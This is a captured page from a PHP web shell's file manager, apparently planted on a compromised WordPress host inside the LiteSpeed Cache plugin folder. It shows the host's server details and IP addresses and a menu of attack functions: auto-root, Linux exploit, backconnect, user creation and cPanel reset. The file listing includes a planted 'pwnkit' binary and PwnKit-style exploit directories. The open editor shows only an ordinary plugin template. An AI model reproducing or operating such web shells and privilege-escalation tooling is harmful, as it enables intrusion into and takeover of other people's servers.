Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.225.98.100
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
litespeed-cache /
tpl /
toolbox /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
beta_test.tpl.php
3.19
KB
-rw-r--r--
edit_htaccess.tpl.php
3.36
KB
-rw-r--r--
entry.tpl.php
1.64
KB
-rw-r--r--
heartbeat.tpl.php
3.87
KB
-rw-r--r--
import_export.tpl.php
2.3
KB
-rw-r--r--
log_viewer.tpl.php
2.35
KB
-rw-r--r--
purge.tpl.php
10.3
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
report.tpl.php
4.86
KB
-rw-r--r--
settings-debug.tpl.php
4.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : heartbeat.tpl.php
<?php namespace LiteSpeed; defined( 'WPINC' ) || exit; $this->form_action(); ?> <h3 class="litespeed-title-short"> <?php echo __( 'Heartbeat Control', 'litespeed-cache' ); ?> <?php Doc::learn_more( 'https://docs.litespeedtech.com/lscache/lscwp/toolbox/#heartbeat-tab' ); ?> </h3> <div class="litespeed-callout notice notice-warning inline"> <h4><?php echo __( 'NOTICE:', 'litespeed-cache' ); ?></h4> <p><?php echo __( 'Disable WordPress interval heartbeat to reduce server load.', 'litespeed-cache' ); ?> <span class="litespeed-warning"> 🚨 <?php echo __( 'Disabling this may cause WordPress tasks triggered by AJAX to stop working.', 'litespeed-cache' ); ?> </span></p> </div> <table class="wp-list-table striped litespeed-table"><tbody> <tr> <th> <?php $id = Base::O_MISC_HEARTBEAT_FRONT; ?> <?php $this->title( $id ); ?> </th> <td> <?php $this->build_switch( $id ); ?> <div class="litespeed-desc"> <?php echo __( 'Turn ON to control heartbeat on frontend.', 'litespeed-cache' ); ?> </div> </td> </tr> <tr> <th> <?php $id = Base::O_MISC_HEARTBEAT_FRONT_TTL; ?> <?php $this->title( $id ); ?> </th> <td> <?php $this->build_input( $id, 'litespeed-input-short'); ?> <?php $this->readable_seconds(); ?> <div class="litespeed-desc"> <?php echo sprintf( __( 'Specify the %s heartbeat interval in seconds.', 'litespeed-cache' ), 'frontend' ); ?> <?php echo sprintf( __( 'WordPress valid interval is %s seconds.', 'litespeed-cache' ), '<code>15</code> - <code>120</code>' ); ?><br /> <?php echo sprintf( __( 'Set to %1$s to forbid heartbeat on %2$s.', 'litespeed-cache' ), '<code>0</code>', 'frontend' ); ?><br /> <?php $this->recommended( $id ); ?> <?php $this->_validate_ttl( $id, 15, 120, true ); ?> </div> </td> </tr> <tr> <th> <?php $id = Base::O_MISC_HEARTBEAT_BACK; ?> <?php $this->title( $id ); ?> </th> <td> <?php $this->build_switch( $id ); ?> <div class="litespeed-desc"> <?php echo __( 'Turn ON to control heartbeat on backend.', 'litespeed-cache' ); ?> </div> </td> </tr> <tr> <th> <?php $id = Base::O_MISC_HEARTBEAT_BACK_TTL; ?> <?php $this->title( $id ); ?> </th> <td> <?php $this->build_input( $id, 'litespeed-input-short'); ?> <?php $this->readable_seconds(); ?> <div class="litespeed-desc"> <?php echo sprintf( __( 'Specify the %s heartbeat interval in seconds.', 'litespeed-cache' ), 'backend' ); ?> <?php echo sprintf( __( 'WordPress valid interval is %s seconds', 'litespeed-cache' ), '<code>15</code> ~ <code>120</code>' ); ?><br /> <?php echo sprintf( __( 'Set to %1$s to forbid heartbeat on %2$s.', 'litespeed-cache' ), '<code>0</code>', 'backend' ); ?><br /> <?php $this->recommended( $id ); ?> <?php $this->_validate_ttl( $id, 15, 120, true ); ?> </div> </td> </tr> <tr> <th> <?php $id = Base::O_MISC_HEARTBEAT_EDITOR; ?> <?php $this->title( $id ); ?> </th> <td> <?php $this->build_switch( $id ); ?> <div class="litespeed-desc"> <?php echo __( 'Turn ON to control heartbeat in backend editor.', 'litespeed-cache' ); ?> </div> </td> </tr> <tr> <th> <?php $id = Base::O_MISC_HEARTBEAT_EDITOR_TTL; ?> <?php $this->title( $id ); ?> </th> <td> <?php $this->build_input( $id, 'litespeed-input-short'); ?> <?php $this->readable_seconds(); ?> <div class="litespeed-desc"> <?php echo sprintf( __( 'Specify the %s heartbeat interval in seconds.', 'litespeed-cache' ), 'backend editor' ); ?> <?php echo sprintf( __( 'WordPress valid interval is %s seconds', 'litespeed-cache' ), '<code>15</code> ~ <code>120</code>' ); ?><br /> <?php echo sprintf( __( 'Set to %1$s to forbid heartbeat on %2$s.', 'litespeed-cache' ), '<code>0</code>', 'frontend' ); ?><br /> <?php $this->recommended( $id ); ?> <?php $this->_validate_ttl( $id, 15, 120, true ); ?> </div> </td> </tr> </tbody></table> <?php $this->form_end(); ?>
Close